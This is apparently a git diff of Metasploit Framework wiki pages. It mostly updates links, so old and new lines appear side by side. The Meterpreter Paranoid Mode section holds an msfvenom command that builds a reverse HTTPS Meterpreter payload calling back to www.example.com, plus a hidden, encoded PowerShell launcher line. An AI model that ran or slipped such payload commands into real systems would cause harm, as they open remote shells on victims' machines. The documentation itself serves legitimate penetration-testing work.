Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [Dev environment setup](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.
Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [Dev environment setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.
# The short story
- Configure your git environment as described [here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#keeping-in-sync).
- Configure your git environment as described [here](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html#keeping-in-sync).
- Add the `fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*` line to your `.git/config`.
- Add your signing key `git config --global user.signingkey`
- Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below:
- Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below:
```
pub rsa4096 2020-04-07 [SC]
@ -16,7 +16,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
sub rsa4096 2020-04-07 [E]
```
- Set the GPG key as your signing key. To set the key shown above as the signing key for all repositories, one would execute:
```
git config --global user.signingkey 3198961E148FF5E527E31A5FD35E05C0F2B81E83
```
@ -30,13 +30,13 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
Fixes #1024, also see #999.
````
- The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a
- The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a
nice assurance that you're really you.
- The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if
- The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if
the merge would normally be resolved as a fast forwards. This ensure that all changes have a
commit associated with them.
- The `--edit` flag will drop you into your default editor (normally vim), and will allow you
to edit the commit message so that it conforms to Metasploit standards, rather than sticking
- The `--edit` flag will drop you into your default editor (normally vim), and will allow you
to edit the commit message so that it conforms to Metasploit standards, rather than sticking
with git's pre-generated commit message which does not.
- Note that the `--no-ff` flag should be used both for PRs that go back to a contributor's branch as well as PRs that land in Metasploit's master branch.
- If you're making changes (often the case), merge to a landing branch, then merge **that** branch to upstream/master with the `-S --no-ff --edit` options.
@ -46,7 +46,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
Check out [this gist](https://gist.github.com/todb-r7/3fbee1a9e7b36d82ca55) that automates (mostly) landing pull requests, signing the merge commit, all while rarely losing a race with other committers.
# Fork and clone
First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [as described here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#wiki-ssh), but the https method will work, too.
First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [as described here](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html#wiki-ssh), but the https method will work, too.
Once this is done, you will have a remote repository called "origin," which points to your forked repository on GitHub. You will be doing most of your work in your own fork of Metasploit, even if you have commit rights to Rapid7's fork. Now, we're going to add an "upstream" repository to talk to the Rapid7 repository.
@ -135,7 +135,7 @@ In this particular case with PR #1217, I did want to send some changes back to t
Here's an example with #6954 (your workflow may vary):
```
$ git checkout upstream/master
$ git checkout upstream/master
Note: checking out 'upstream/master'.
You are in 'detached HEAD' state. You can look around, make experimental
@ -258,7 +258,7 @@ c = commit -S --edit
m = merge -S --no-ff --edit
````
People with commit rights to rapid7/metasploit-framework will have their [keys listed here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
People with commit rights to rapid7/metasploit-framework will have their [keys listed here](https://docs.metasploit.com/docs/development/maintainers/committer-keys.html).
# Post-Merge
@ -291,4 +291,4 @@ If that works, great, you know you don't have any merge conflicts right now.
# Questions and Corrections
Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.

8
docs/metasploit-framework.wiki/Metasploit-5.0-Release-Notes.md
View File

@ -1,6 +1,6 @@
Metasploit Framework 5.0 has released!
Metasploit Framework 5.0 has released!
Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.
Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.
See the release announcement [here](https://blog.rapid7.com/2019/01/10/metasploit-framework-5-0-released).
@ -12,7 +12,7 @@ The following is a high-level overview of Metasploit 5.0's features and capabili
* A JSON-RPC API enables users to integrate Metasploit with additional tools and languages.
* This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services [here](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
* This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services [here](https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html).
* Adds `evasion` module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules [here](https://www.rapid7.com/info/encapsulating-antivirus-av-evasion-techniques-in-metasploit-framework). Rapid7's first evasion modules are [here](https://github.com/rapid7/metasploit-framework/pull/10759).
@ -28,6 +28,6 @@ The following is a high-level overview of Metasploit 5.0's features and capabili
You can get Metasploit 5.0 by checking out the [5.0.0 tag](https://github.com/rapid7/metasploit-framework/releases/tag/5.0.0) in the Metasploit GitHub project.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
See all the ways to stay informed and get involved at <https://metasploit.com>.

4
docs/metasploit-framework.wiki/Metasploit-6.0-Development-Notes.md
View File

@ -22,7 +22,7 @@ Metasploit 6 adds support for SMB client connections using the version 3 dialect
While many modules were updated to use the RubySMB SMB 3 implementation, not all were updated. Notably many older exploits that pre-date the release of SMB 3 were not updated and continue to use the original Rex implementation of the protocol. For those modules that have been updated however, users will be able to use them without any changes to their work flow. By default the newest dialect will be negotiated with the remote server and if it is one of the dialects within version 3 that supports encryption, the framework will use encryption by default. Users can alter this behavior by setting the `SMB::AlwaysEncrypt` and `SMB::ProtocolVersion` options. `SMB::AlwaysEncrypt` enforces encryption for SMB 3 connections even when the server does not require it (defaults to: `true`) while `SMB::ProtocolVersion` is a comma separated list of versions to allow the framework to negotiate (default: `1,2,3`).
Module authors looking to write SMB modules should note the move towards the [RubySMB](https://github.com/rapid7/ruby_smb) protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the [mixins](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/smb) however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see [Guidelines for Writing Modules with SMB](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Writing-Modules-with-SMB).
Module authors looking to write SMB modules should note the move towards the [RubySMB](https://github.com/rapid7/ruby_smb) protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the [mixins](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/smb) however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see [Guidelines for Writing Modules with SMB](https://docs.metasploit.com/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html).
## Pull Requests
@ -48,6 +48,6 @@ A complete list of pull requests included as part of the initial version 6 work:
You can get Metasploit 6.0 by checking out the [6.0.0 tag](https://github.com/rapid7/metasploit-framework/releases/tag/6.0.0) in the Metasploit GitHub project.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
See all the ways to stay informed and get involved at <https://metasploit.com>.

4
docs/metasploit-framework.wiki/Metasploit-Data-Service-Enhancements-Goliath.md
View File

@ -30,7 +30,7 @@ Our solution to this is a data service proxy. A data service proxy allows us to
Currently we plan to support the legacy data storage technology stack (RAILS/PostgreSQL) which we hope to eventually phase out. The new implementation will use a RESTful (https://en.wikipedia.org/wiki/Representational_state_transfer) approach whereby calls to `framework.db` can be proxied to a remote web service that supports the same data service API. We have built a web service that runs atop the current data storage service for the community.
This approach enables us to:
* More easily enhance the metasploit data model
* More easily enhance the Metasploit data model
* Run a web-based data service independent of the Metasploit Framework
* Reduces the memory used by a Metasploit Framework instance using a data service by no longer requiring a DB client
* Increases throughput as storage calls don't necessarily need to be asynchronous
@ -41,4 +41,4 @@ This approach enables us to:
## Usage
For more information on setting up the web service and using the data services see [Metasploit Web Service](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
For more information on setting up the web service and using the data services see [Metasploit Web Service](https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html).

36
docs/metasploit-framework.wiki/Metasploit-Database-Support.md
View File

@ -1,22 +1,22 @@
## What is msfdb?
msfdb is a script included with all installations of Metasploit that allows you to easily setup and control both a database and a Web Service capable of connecting this database with Metasploit.
While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found [here](https://metasploit.help.rapid7.com/docs/managing-the-database).
While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found [here](https://metasploit.help.rapid7.com/docs/managing-the-database).
## Why should I use msfdb?
It's not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database.
It's not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database.
The Metasploit features that require a connected database include:
* Recording other machines on a network that are found with a nmap scan via the `db_nmap` command are stored as "Hosts".
* Hosts can be viewed with the `hosts` command
* Storing credentials successfully extracted by exploits are stored as "creds".
* Storing credentials successfully extracted by exploits are stored as "creds".
* Credentials are viewed with the `creds` command.
* Keeping track of successful exploitation attempts are recorded as "Vulnerabilities".
* Keeping track of successful exploitation attempts are recorded as "Vulnerabilities".
* Successful exploitations can be viewed with the `vulns` command.
* The `vulns` command also tracks unsuccessful exploitation attempts
* The `vulns` command also tracks unsuccessful exploitation attempts
* Storing services detected on remote hosts by `db_nmap` are recorded as "Services"
* Remote services are viewed with the `services` command
* Tracking multiple remote sessions opened by exploit payloads
* Tracking multiple remote sessions opened by exploit payloads
* These sessions can be managed and tracked with the `sessions` command.
* Storing any difficult to define information returned by successful exploits as "Loot"
* Viewable with the `loot` command
@ -62,7 +62,7 @@ Generating SSL key and certificate for MSF web service
Attempting to start MSF web service...success
MSF web service started and online
Creating MSF web service user your_current_account_name
############################################################
## MSF Web Service Credentials ##
## ##
@ -77,15 +77,15 @@ MSF web service user API token: super_secret_api_token
MSF web service configuration complete
The web service has been configured as your default data service in msfconsole with the name "local-https-data-service"
If needed, manually reconnect to the data service in msfconsole using the command:
db_connect --token super_secret_api_token --cert /Users/your_current_account_name/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443
The username and password are credentials for the API account:
https://localhost:5443/api/v1/auth/account
```
Again, this is a lot of information to process, but it's not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed:
Again, this is a lot of information to process, but it's not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed:
```
MSF web service username: your_current_account_name
@ -93,7 +93,7 @@ MSF web service password: super_secret_password
MSF web service user API token: super_secret_api_token
```
Followed by instructions on how to connect to your database with Metasploit via the Web Service:
Followed by instructions on how to connect to your database with Metasploit via the Web Service:
```
If needed, manually reconnect to the data service in msfconsole using the command:
@ -109,23 +109,23 @@ https://localhost:5443/api/v1/auth/account
All this information is loaded by Metasploit automatically at startup from the ~/.msf4 folder. You should copy the credentials to a file in case you need them in the future. If you forget or lose the credentials but you can always run `./msfdb reinit` and reset the Web Service authentication details. **Just make sure to say no to the prompt asking you if you want to delete the Database contents!**
## msfdb commands
## msfdb commands
The commands for msfdb are as follows:
* `./msfdb init` Creates and begins execution of a database & web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice.
* `./msfdb delete` Deletes the web service and database configuration files. You will also be prompted to delete the database's contents, but this is not mandatory.
* `./msfdb init` Creates and begins execution of a database & web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice.
* `./msfdb delete` Deletes the web service and database configuration files. You will also be prompted to delete the database's contents, but this is not mandatory.
* `./msfdb reinit` The same as running `./msfdb delete` followed immediately by `./msfdb init`.
* `./msfdb status` Displays if the database & web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed.
* `./msfdb status` Displays if the database & web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed.
* `./msfdb start` Start the database & web service.
* `./msfdb stop` Stop the database & web service.
* `./msfdb stop` Stop the database & web service.
* `./msfdb restart` The same as running `./msfdb stop` followed immediately by `./msfdb start`.
## msfdb errors
In the case of any of the above commands printing either a stack trace or error, your first step should be to run `./msfdb reinit` (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an [error ticket](https://github.com/rapid7/metasploit-framework/issues/new/choose).
In the case of any of the above commands printing either a stack trace or error, your first step should be to run `./msfdb reinit` (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an [error ticket](https://github.com/rapid7/metasploit-framework/issues/new/choose).
## What's next?
That's it for the simple high level explanation of how to setup a database for metasploit. If that wasn't enough detail for you you can check out our more in depth explanation [here](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
That's it for the simple high level explanation of how to setup a database for metasploit. If that wasn't enough detail for you you can check out our more in depth explanation [here](https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html).
If you want to get started hacking but don't know how to, here are a few guides we really like:
* [The easiest metasploit guide you'll ever read](https://www.exploit-db.com/docs/english/44040-the-easiest-metasploit-guide-you%E2%80%99ll-ever-read.pdf) - A great, easy to follow guide on how to set up Metasploit and Metasploitable (Our intentionally vulnerable Linux virtual machine used to for security training) for VMs. Also has a fantastic guide on penetration testing Metasploitable 2, from information gathering right up to exploitation.

4
docs/metasploit-framework.wiki/Metasploit-Guide-Setting-Module-Options.md
View File

@ -9,7 +9,7 @@ Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
@ -67,7 +67,7 @@ Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
```
### Setting options

4
docs/metasploit-framework.wiki/Meterpreter-Configuration.md
View File

@ -71,8 +71,8 @@ The notion of a session configuration block is used to wrap up the following val
* **Socket handle** - When Meterpreter is invoked with TCP communications, an active socket is already in use. This socket handle is intended to be reused by Meterpreter when `metsrv` executes. This socket handle is written to the configuration block on the fly by the loader. It is stored in the Session configuration block so that it has a known location. This value is always a 32-bit DWORD, even on 64-bit platforms.
* **Exit func** - This value is a 32-bit DWORD value that identifies the method that should be used when terminating the Meterpreter session. This value is the equivalent of the [Block API Hash](https://github.com/rapid7/rex-text/blob/0e3b7d3246f9db257465f385f21d6e5385d85212/lib/rex/text/block_api.rb#L16) that represents the function to be invoked. Meterpreter used to delegate the responsibility of handling this to the stager that had invoked it. Meterpreter no longer does this, instead, it handles the closing of the Meterpreter session by itself, and hence the chosen method for termination must be made known in the configuration.
* **Session expiry value** - This is a 32-bit DWORD that contains the number of seconds that the Meterpreter session should last for. While Meterpreter is running, this value is continually checked, and if the session expiry time is reached, then Meterpreter shuts itself down. For more information, please read [Meterpreter Timeout Control](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control).
* **UUID** - This is a 16-byte value that represents a payload UUID. A UUID is a new concept that has come to Metasploit with a goal of tracking payload type and origin, and validating that sessions received by Metasploit are intended for use by the current installation. For more information, please read [Payload UUID](https://github.com/rapid7/metasploit-framework/wiki/Payload-UUID).
* **Session expiry value** - This is a 32-bit DWORD that contains the number of seconds that the Meterpreter session should last for. While Meterpreter is running, this value is continually checked, and if the session expiry time is reached, then Meterpreter shuts itself down. For more information, please read [Meterpreter Timeout Control](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html).
* **UUID** - This is a 16-byte value that represents a payload UUID. A UUID is a new concept that has come to Metasploit with a goal of tracking payload type and origin, and validating that sessions received by Metasploit are intended for use by the current installation. For more information, please read [Payload UUID](https://docs.metasploit.com/docs/using-metasploit/intermediate/payload-uuid.html).
The layout of this block in memory looks like this:

4
docs/metasploit-framework.wiki/Meterpreter-Paranoid-Mode.md
View File

@ -14,12 +14,12 @@ rm -f www.example.com.key www.example.com.crt
### Create a Paranoid Payload
For this use case, we will combine [[Payload UUID]] tracking and whitelisting with [TLS pinning](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-HTTP-Communication#tls-certificate-pinning). For a staged payload, we will use the following command:
For this use case, we will combine [[Payload UUID]] tracking and whitelisting with [TLS pinning](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-http-communication.html#tls-certificate-pinning). For a staged payload, we will use the following command:
```
$ ./msfvenom -p windows/meterpreter/reverse_winhttps LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o launch-paranoid.bat
$ head launch-paranoid.bat
$ head launch-paranoid.bat
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg...
```

4
docs/metasploit-framework.wiki/Meterpreter-Reliable-Network-Communication.md
View File

@ -2,9 +2,9 @@ Of the many recent changes to Meterpreter, reliable network communication is one
In the case of HTTP/S transports, some resiliency features were present. Thanks to its stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur.
Revamped [transport](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control) implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
Revamped [transport](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html) implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [timeout documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control) for details on those timeout values.
It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [timeout documentation](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html) for details on those timeout values.
Behind the scenes, Meterpreter now maintains a circular linked list of transports in memory while running. When a transport fails, Meterpreter will shut down and clean up the current transport mechanism resources, and will move onto the next one in the list. From there, Meterpreter will use this transport configuration to attempt to reconnect to Metasploit. It will continue to make these attempts until one of the following occurs:

2
docs/metasploit-framework.wiki/Meterpreter-Sleep-Control.md
View File

@ -8,7 +8,7 @@ For these reasons, and more, the new `sleep` command in Meterpreter was created.
## Silent shells
Noise during an assessment is not necessarily a good thing. With the advent of Meterpreter's new support and control of [multiple transports](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control), Meterpreter has the ability to change transports and therefore change the traffic pattern for communication. However, sometimes this isn't enough and sometimes users want to be able to shut the session off temporarily.
Noise during an assessment is not necessarily a good thing. With the advent of Meterpreter's new support and control of [multiple transports](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html), Meterpreter has the ability to change transports and therefore change the traffic pattern for communication. However, sometimes this isn't enough and sometimes users want to be able to shut the session off temporarily.
The `sleep` command is designed to do just that: make the current Meterpreter session go to sleep for a specified period of time, and the wake up again once that time has expired.

16
docs/metasploit-framework.wiki/Meterpreter-Transport-Control.md
View File

@ -74,7 +74,7 @@ Session Expiry : @ 2015-06-09 19:56:05
* tcp://10.1.10.40:6000 300 3600 10
```
The first part of the output is the session expiry time. To learn more about expiry time, see [Meterpreter Timeout Control][].
The first part of the output is the session expiry time. To learn more about expiry time, see [Meterpreter Timeout Control][].
The above output shows that we have one transport enabled that is using `TCP`. We can infer that the transport was a `reverse_tcp` (rather than `bind_tcp`) due to the fact that there is a host IP address in the transport URL. If it was a `bind_tcp`, this would be blank.
@ -88,8 +88,8 @@ Session Expiry : @ 2015-06-09 19:56:05
Curr URL Comms T/O Retry Total Retry Wait User Agent Proxy Host Proxy User Proxy Pass Cert Hash
---- --- --------- ----------- ---------- ---------- ---------- ---------- ---------- ---------
* tcp://10.1.10.40:6000 300 3600 10
http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 Totes-Legit Browser/1.1
* tcp://10.1.10.40:6000 300 3600 10
http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 Totes-Legit Browser/1.1
```
### Adding transports
@ -174,7 +174,7 @@ meterpreter > transport next
[+] Successfully changed to the next transport, killing current session.
[*] 10.1.10.35 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) >
msf exploit(handler) >
[*] 10.1.10.40:46130 (UUID: 8e97549ed2baf6a8/x86_64=2/windows=1/2015-06-02T09:56:05Z) Attaching orphaned/stageless session ...
[*] Meterpreter session 2 opened (10.1.10.40:5105 -> 10.1.10.40:46130) at 2015-06-02 20:53:54 +1000
@ -273,7 +273,7 @@ Session Expiry : @ 2015-07-10 07:39:08
---- --- --------- ----------- ----------
* tcp://10.1.10.40:5000 300 3600 10
meterpreter >
meterpreter >
```
### Resilient transports
@ -350,7 +350,7 @@ The session is back up and running as if nothing had gone wrong.
In the case where Meterpreter is configured with only a single transport mechanism, this process still takes place. Meterpreter's transport list implementation is a cyclic linked-list, and once the end of the list has been reached, it simply starts from the beginning again. This means that if there's a list of one transport then Meterpreter will continually attempt to use that one transport until the session expires. This works for both `TCP` and `HTTP/S`.
For important detail on network resiliency, please see the [reliable network communication documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication).
For important detail on network resiliency, please see the [reliable network communication documentation](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html).
## Supported Meterpreters
@ -363,5 +363,5 @@ The following Meterpreter implementations currently support the transport comman
* Java
* Python
[Timeout documentation]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control
[Reliable Network documentation]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication
[Timeout documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html
[Reliable Network documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html

2
docs/metasploit-framework.wiki/Python-Extension.md
View File

@ -331,7 +331,7 @@ Hell no! But the goal is to get closer and closer to perfect as we go. It's up t
Please do, making good use of the Github issues feature. Better still, create a PR for one!
[transport]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control
[transport]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html
[inveigh]: https://github.com/Kevin-Robertson/Inveigh
## Currently Loadable Native Libraries

20
docs/metasploit-framework.wiki/Reporting-a-Bug.md
View File

@ -4,7 +4,7 @@ Metasploit gets hundreds of issue reports every year on our [issue tracker](http
But first...two important exceptions to bug/issue reports.
## When NOT to use Metasploit's issue tracker
## When NOT to use Metasploit's issue tracker
**NOTE:** There are two situations where, even if you have found what you know is a bug, you should not open a bug report on our public issue tracker.
1. You should not open a bug report on Metasploit Framework's issue tracker if you are a Metasploit Pro customer.
2. You should not open a bug report when you have found a security issue with Metasploit itself.
@ -13,13 +13,13 @@ But first...two important exceptions to bug/issue reports.
If you are a Metasploit Pro customer, you can log in to Rapid7's customer support portal [here](https://www.rapid7.com/for-customers/). You are also able to reach out to your CSM or support representative if you prefer. To provide a consistent customer experience, Metasploit Framework community members, committers, and open-source developers do not offer support for commercial Rapid7 products. Rapid7's support resources and team members are well-equipped to handle your Metasploit Pro support needs!
### Security Issues
If you have a security issue with Metasploit itself, you should email security@rapid7.com or let us know [here](https://www.rapid7.com/security/). Rapid7's disclosure policy is [here](https://www.rapid7.com/security/disclosure/). In general, our security teams are happy to give you credit, inform you about progress, and explore related issues with you if you'd like. They're also happy to keep you anonymous if that's what you prefer. All of this is significantly easier if you report security issues in a manner that lets our teams quickly work with you to understand the problem! Clear communication and coordinated disclosure give us the best chance of fixing any security issues quickly and protecting users.
If you have a security issue with Metasploit itself, you should email security@rapid7.com or let us know [here](https://www.rapid7.com/security/). Rapid7's disclosure policy is [here](https://www.rapid7.com/security/disclosure/). In general, our security teams are happy to give you credit, inform you about progress, and explore related issues with you if you'd like. They're also happy to keep you anonymous if that's what you prefer. All of this is significantly easier if you report security issues in a manner that lets our teams quickly work with you to understand the problem! Clear communication and coordinated disclosure give us the best chance of fixing any security issues quickly and protecting users.
Now on to the good stuff! The Metasploit development community has read thousands of bug reports over the past 15 years, and a well-written bug report makes fixing bugs much faster and easier. In fact, in our experience, how quickly we can understand and fix an issue has more to do with bug report quality than the complexity of the bug itself.
## General Rules
* Ensure the platform you're reporting the issue for is supported. We do not, for instance, support Termux currently. If your platform is not officially supported, the community may still have resources to help, but you should search for and ask about those outside Metasploit's issue tracker.
* When possible, it helps if you are running the latest stable version of Metasploit Framework, or the latest release of Kali, BlackArch Linux, or your other favorite security distribution that ships with Metasploit. Metasploit's [nightly installers are here](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers) and typically offer the latest Framework release.
* When possible, it helps if you are running the latest stable version of Metasploit Framework, or the latest release of Kali, BlackArch Linux, or your other favorite security distribution that ships with Metasploit. Metasploit's [nightly installers are here](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html) and typically offer the latest Framework release.
* Review our [code of conduct](https://github.com/rapid7/metasploit-framework/blob/master/CODE_OF_CONDUCT.md) before submitting issues.
* Use a specific title so we can understand immediately which part of Metasploit is causing the unexpected behavior. "NoMethodError raised on smb_login module" is a great title. "Problem with Metasploit target" is not.
* Redact any private or sensitive data, such as target IPs or URLs, passwords, or personally identifying information.
@ -31,7 +31,7 @@ We ask for several different pieces of information when users report issues in M
### Steps to reproduce
What did you do to get the results you got? Can you give us step-by-step instructions to get the same results you got? Are you able to consistently reproduce the issue in your own environment?
### Which OS are you using? What do we need to know about your environment and/or target?
### Which OS are you using? What do we need to know about your environment and/or target?
Tell us which operating system you're using and any relevant information about your setup. If the module or feature you're having trouble with requires any external dependencies, check whether they are installed, and (if not) whether installing them could solve your problem.
If you're having problems with a target (victim), tell us the target operating system and service versions.(Please ensure you've redacted any private or sensitive data!) If the module or feature you're having trouble with requires any external dependencies, check whether that could solve your problem.
@ -52,17 +52,17 @@ Did you install Metasploit with...
- [ ] Commercial installer (from <https://www.rapid7.com/products/metasploit/download/>)
- [ ] Source install (please specify Ruby version)
